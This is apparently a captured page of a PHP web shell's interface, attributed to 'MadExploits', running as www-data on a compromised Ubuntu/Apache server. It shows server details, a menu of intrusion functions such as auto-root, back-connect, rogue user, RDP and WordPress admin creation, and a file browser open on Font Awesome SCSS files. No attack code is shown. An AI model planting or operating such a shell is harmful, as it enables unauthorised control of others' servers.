Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.72
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
thetds /
vendor /
font-awesome /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
_animated.scss
715
B
-rw-r--r--
_bordered-pulled.scss
592
B
-rw-r--r--
_core.scss
459
B
-rw-r--r--
_fixed-width.scss
120
B
-rw-r--r--
_icons.scss
45.88
KB
-rw-r--r--
_larger.scss
375
B
-rw-r--r--
_list.scss
378
B
-rw-r--r--
_mixins.scss
1.6
KB
-rw-r--r--
_path.scss
783
B
-rw-r--r--
_rotated-flipped.scss
672
B
-rw-r--r--
_screen-reader.scss
134
B
-rw-r--r--
_stacked.scss
482
B
-rw-r--r--
_variables.scss
20.48
KB
-rw-r--r--
font-awesome.scss
430
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _animated.scss
// Spinning Icons // -------------------------- .#{$fa-css-prefix}-spin { -webkit-animation: fa-spin 2s infinite linear; animation: fa-spin 2s infinite linear; } .#{$fa-css-prefix}-pulse { -webkit-animation: fa-spin 1s infinite steps(8); animation: fa-spin 1s infinite steps(8); } @-webkit-keyframes fa-spin { 0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -webkit-transform: rotate(359deg); transform: rotate(359deg); } } @keyframes fa-spin { 0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -webkit-transform: rotate(359deg); transform: rotate(359deg); } }
Close